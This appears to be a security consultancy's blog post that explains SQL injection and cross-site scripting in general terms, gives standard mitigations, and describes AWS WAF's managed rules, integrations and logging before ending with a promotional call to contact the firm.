I know what you’re thinking. That is a lot of acronyms. Let’s break down the problem we’re tackling. The Open Web Application Security Project is an online community that produces freely-available articles, methodologies, documentation, tools, and technologies in the field of web application security. The OWASP Top 10 is a document aimed at development and security professionals, designed to highlight the most critical and prevalent security threats and how to mitigate them. for developers and web application security.
AWS WAF is a web application firewall that helps protect your web applications or APIs against common web exploits by using a set of rules designed to identify and actively block common attack patterns such as SQL Injection and Cross Site Scripting.
Any application that uses a SQL based data storage layer needs to be prepared to deal with SQL injection. This type of attack consists of insertion of a SQL query into an input field responsible for sending data from the client to the database server. This attack affects the execution of predefined, authorised SQL statements. If a web app is vulnerable to this attack, the attacks severity is limited only by the attacker’s skill and imagination. An educated attacker can potentially read sensitive data from the database by injecting SELECT and JOIN statements, or modify database data using UPDATE and DELETE statements.
There are some ways to prevent this attack, input validation should always be performed on the backend server as well as the frontend interface. Parameterized queries should be utilized with prepared statements to prevent nested statements being passed with legitimate input variables. Finally, an application should only have the access it requires, for example, if the application simply reads from a database, there is no reason to give it write access.
Cross-Site Scripting (XSS) attacks are also a type of injection attack where an attacker uses an input form or api to send malicious code, generally in the form of a browser side script, to a database which unknowingly serves that script to different end users browser. Because the script came from a trusted source (ie the genuine web server), the malicious script is executed on load and can access/transmit information stored by the browser such as cookies, session tokens, or other sensitive information.
These attacks can occur anywhere a web application uses input from a user within the output it generates without validating or encoding it, so similar to prevent SQL injection, input should be validated on both the front end and the backend.
We mentioned that WAF uses a set of rules, these rules can be provided and managed by AWS, they can be purchased from third parties through the AWS Marketplace or they can be fully customised and designed in-house. The list of rules provided by AWS is frequently updated to address the latest threats. By combining these rules, you can achieve near real-time visibility into every layer of your web traffic, from IP address to HTTP request content.
WAF can be integrated into a variety of the available entry points into your cloud environment, Cloud Front, Application Load Balancer, API Gateway and AppSync all have built in support allowing you to have consistent security across all ingress paths.
AWS WAF includes a full-featured API that enables you to incorporate web security at multiple points in the development process, from development, to deployment, to post deployment management and auditing.
Logging is not just an afterthought with WAF, it is designed to capture each inspected web request’s full header data for use in security automation, analytics, or auditing purposes. If any issues are found, rules can easily be added or modified and can propagate across all services in less than a minute.
Conclusion
Our team offers solutions that allow businesses in a wide range of industries to unlock their potential while remaining compliant, secure and competitive. Reach out to us today to learn more about our process or start your journey.